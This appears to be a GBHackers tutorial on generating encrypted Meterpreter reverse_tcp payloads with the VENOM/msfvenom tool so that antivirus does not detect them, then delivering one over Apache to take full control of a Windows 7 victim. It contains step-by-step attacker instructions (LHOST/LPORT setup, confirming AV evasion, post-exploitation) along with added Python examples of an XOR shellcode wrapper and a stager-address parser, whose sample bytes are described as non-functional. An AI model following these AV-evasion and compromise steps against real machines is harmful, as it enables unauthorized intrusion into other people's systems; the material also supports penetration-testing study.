Much of today's malware, and many attack payloads, use encryption and packing (via packers) to evade antivirus software: a signature-based scanner has difficulty recognising code whose bytes on disk have been transformed, even though the original shellcode reappears in memory when the wrapper decrypts it at run time.
Here we are going to learn how to generate encrypted payloads with VENOM, the Metasploit shellcode generator/compiler/listener tool.
According to its description, VENOM uses msfvenom (Metasploit) to generate shellcode in different formats (c | python | ruby | dll | msi | hta-psh) and injects the generated shellcode into a function in that language (for example, Python).
The Python function executes the shellcode in RAM. VENOM then uses a compiler such as gcc (the GNU Compiler Collection) or mingw32 (a Windows cross-compiler), or pyinstaller, to build the executable file, and also starts a multi/handler to receive the remote connection (reverse shell or Meterpreter session).
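The following added example (written for this page, not VENOM's own code) shows what such a wrapper does with msfvenom output: it XOR-encrypts a stand-in for shellcode with a random key, renders a Python stub that decrypts it at run time, and runs a toy byte-signature scanner over the raw shellcode, the stored (encrypted) blob, and the decrypted run-time buffer. The sample bytes, the signature database and the stub format are all constructed for the example; the sample is not functional shellcode, and nothing here allocates executable memory or executes anything but the stub's decrypt function.

```python
"""Added example: what a VENOM-style Python wrapper does with msfvenom output.

Not VENOM's code. Encrypts a constructed stand-in for shellcode, renders a
Python stub that decrypts it at run time, and shows why a byte-signature
scanner matches the plain shellcode but not the stored (encrypted) blob.
Nothing here allocates executable memory or runs shellcode.
"""
import os
from typing import Dict, List, Optional, Tuple

# Constructed sample. The first 15 bytes mirror the well-known prologue of the
# Metasploit x86 stager (cld; call; pushad; mov ebp,esp; xor eax,eax; ...); the
# rest is filler. It is not functional shellcode and is never executed.
SAMPLE_SHELLCODE = bytes.fromhex("fce8820000006089e531c0648b5030") + bytes(range(16, 48))

# Toy static-signature database (constructed), standing in for an AV engine's
# byte patterns. Real engines use far more patterns plus heuristics/emulation.
SIGNATURES: Dict[str, bytes] = {
    "msf_x86_stager_prologue": bytes.fromhex("fce8820000006089e5"),
}


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a repeating `key`. Symmetric: encrypts and decrypts."""
    if not key or not any(key):
        # An empty or all-zero key leaves the bytes unchanged, so the "encrypted"
        # payload would still carry the original signature. Refuse it.
        raise ValueError("key must be non-empty and not all zero bytes")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def scan(blob: bytes) -> List[str]:
    """Names of signatures present in `blob` (stand-in for a static AV scan)."""
    return [name for name, pattern in SIGNATURES.items() if pattern in blob]


def render_stub(key: bytes, encrypted: bytes) -> str:
    """Render the Python wrapper as source text (hypothetical stub layout).

    A real wrapper would hand decrypt()'s result to VirtualAlloc / RtlMoveMemory /
    CreateThread via ctypes; this stub deliberately stops at the decrypted buffer.
    """
    return (
        "KEY = " + repr(key) + "\n"
        "ENC = " + repr(encrypted) + "\n"
        "def decrypt():\n"
        "    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(ENC))\n"
    )


def build(shellcode: bytes, key: Optional[bytes] = None) -> Tuple[bytes, bytes, str]:
    """Encrypt `shellcode` and render the stub. Random 16-byte key unless given."""
    key = key or os.urandom(16)
    encrypted = xor_crypt(shellcode, key)
    return key, encrypted, render_stub(key, encrypted)


def run_stub(stub_source: str) -> bytes:
    """Execute the rendered stub's decrypt() in an isolated namespace."""
    namespace: dict = {}
    exec(compile(stub_source, "<stub>", "exec"), namespace)
    return namespace["decrypt"]()


def demo(key: Optional[bytes] = None) -> dict:
    """Compare static scan results for plaintext, stored blob and run-time buffer."""
    key, encrypted, stub = build(SAMPLE_SHELLCODE, key)
    decrypted = run_stub(stub)
    return {
        "plain_hits": scan(SAMPLE_SHELLCODE),   # signature fires on raw msfvenom output
        "stored_hits": scan(encrypted),         # what a scan of the file on disk sees
        "runtime_hits": scan(decrypted),        # what a memory scanner sees after decrypt
        "roundtrip_ok": decrypted == SAMPLE_SHELLCODE,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point of the three scans is the caveat a practitioner should keep in mind: the encrypted blob on disk no longer contains the signature, but the decrypted buffer does, so any engine that emulates the stub or scans process memory sees exactly what it would have seen in the unwrapped payload. XOR with a repeating key is also trivially reversible; it defeats byte matching, not analysis.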
VENOM is not installed on Kali Linux by default, so you need to download and install it first.
Download VENOM from the Sourceforge website (Download Link).
Once downloaded, extract the ZIP archive and run the tool. In this walkthrough the package was kept on the Desktop.
After launching the tool, it asks you to click OK to continue to the build options.
The next screen shows the build option, target machine, payload format and output location.
Twenty different shellcode build options are listed. This demonstration uses option number 10.
So choose VENOM shellcode option 10 and press OK.
In this step, set the LHOST: enter the IP address of your local (attacking) machine, which will listen for the payload's connection, and press OK.
Once LHOST is set, you are asked for the LPORT. Enter the port you want the handler to listen on and press OK.
VENOM ships with some default Metasploit payloads. Here we use windows/meterpreter/reverse_tcp.
Step 6:
Provide the name for the payload you are about to generate, then press OK.
Once the encrypted payload has been generated successfully, it is stored in the output folder of the VENOM package.
After generating the encrypted payload, I scanned it to check detection by antivirus vendors, and none of them flagged it, so the payload evaded AV detection. Bear in mind that such a scan shows only static detection at that moment: if you upload the file to a public multi-engine scanner the sample is shared with vendors and signatures follow quickly, and behavioural or in-memory detection on the target can still catch the shellcode once the wrapper decrypts and runs it.
Now let us compromise the victim with Metasploit using our encrypted payload.
Start the Apache server to deliver the malicious payload to the victim's machine. Select the server and click OK to continue.
In this step, choose a post-exploitation module; VENOM offers several resource scripts and you can pick any one of them.
I only needed system information, so I chose sysinfo.rc for post-exploitation of the target machine.
This step is optional: you can also run post-exploitation manually from the Meterpreter session after compromising the victim with Metasploit.
Finally, I obtained a Meterpreter session on my target Windows 7 machine using our encrypted payload.
Start the session handler before running the payload on the target: the reverse_tcp stager connects back as soon as it executes and retries only briefly, so a handler that is started afterwards misses the connection. Then confirm the payload was actually delivered to and executed on the target machine.
I executed the payload on the target machine by browsing to the malicious URL (http://192.168.56.103) generated by VENOM.
Before working in Metasploit, check that LHOST and LPORT are set correctly on the handler; they must match the values compiled into the payload, otherwise the session never arrives.
So finally, I successfully compromised the victim and took over full access to the target Windows 7 machine.
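A mismatch between the handler and the payload is the usual reason a session never shows up, and it can be checked on the raw msfvenom output before VENOM wraps it. The added example below (written for this page, not VENOM's or Metasploit's code) recovers LHOST and LPORT from an unencoded Windows x86 reverse_tcp stager and compares them with the handler settings. It assumes the stock x86 stager's layout, in which the sockaddr_in is built with two `push imm32` instructions: `push <ip>` followed by `push <AF_INET | port>` (bytes 68 aa bb cc dd 68 02 00 pp pp, with the port in network byte order). The sample bytes are constructed filler around those two pushes, not working shellcode; once the payload is encrypted or encoded this sequence is no longer visible, which is exactly why the check has to run on the plain stager.

```python
"""Added example (not VENOM's or Metasploit's code): recover LHOST/LPORT from a
raw, unencoded Windows x86 reverse_tcp stager and check them against the
handler configuration.

Assumption: the stock Metasploit x86 reverse_tcp stager builds its sockaddr_in
with `push <ip>` then `push 0x0002 | (port << 16)` (AF_INET plus the port in
network byte order), i.e. the byte sequence
    68 <ip as 4 bytes>  68 02 00 <port, big-endian>
x64 stagers and encoded/encrypted output do not contain this sequence.
"""
import re
import struct
from typing import Optional, Tuple

# push imm32 (0x68) + 4 IP bytes, then push imm32 whose low word is AF_INET (2)
# stored little-endian and whose high word is the port in network byte order.
# DOTALL so an IP or port byte of 0x0a (newline) still matches.
_SOCKADDR_PUSH = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)


def extract_lhost_lport(stager: bytes) -> Optional[Tuple[str, int]]:
    """Return (lhost, lport) from a plain x86 reverse_tcp stager, or None."""
    match = _SOCKADDR_PUSH.search(stager)
    if match is None:
        return None
    lhost = ".".join(str(octet) for octet in match.group(1))
    lport = struct.unpack(">H", match.group(2))[0]
    return lhost, lport


def matches_handler(stager: bytes, lhost: str, lport: int) -> bool:
    """True only if the stager's embedded address equals the handler's LHOST/LPORT."""
    return extract_lhost_lport(stager) == (lhost, lport)


def make_sample(ip: str, port: int) -> bytes:
    """Constructed test input: filler around the two pushes. Not working shellcode.

    6a 0a  push byte 10  (the stager's retry counter)
    68 ..  push <ip>
    68 ..  push <AF_INET | port>
    89 e6  mov esi, esp
    """
    ip_bytes = bytes(int(octet) for octet in ip.split("."))
    return (b"\x6a\x0a"
            + b"\x68" + ip_bytes
            + b"\x68\x02\x00" + struct.pack(">H", port)
            + b"\x89\xe6")


if __name__ == "__main__":
    # Hypothetical handler settings for the walkthrough's attacker box.
    sample = make_sample("192.168.56.103", 4444)
    print("embedded:", extract_lhost_lport(sample))
    print("handler on 192.168.56.103:4444 matches:", matches_handler(sample, "192.168.56.103", 4444))
    print("handler on 192.168.56.103:4445 matches:", matches_handler(sample, "192.168.56.103", 4445))
```

Run it against the file msfvenom produced with `-f raw` (read the bytes and pass them to `extract_lhost_lport`); a `None` result means the bytes are already encoded or encrypted, or the payload is not the x86 reverse_tcp stager this check assumes, so fall back to comparing the options you typed into VENOM with the handler's `show options` output.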
If you have any further doubts or queries, kindly leave a comment. Happy hacking.
Source: GBHackers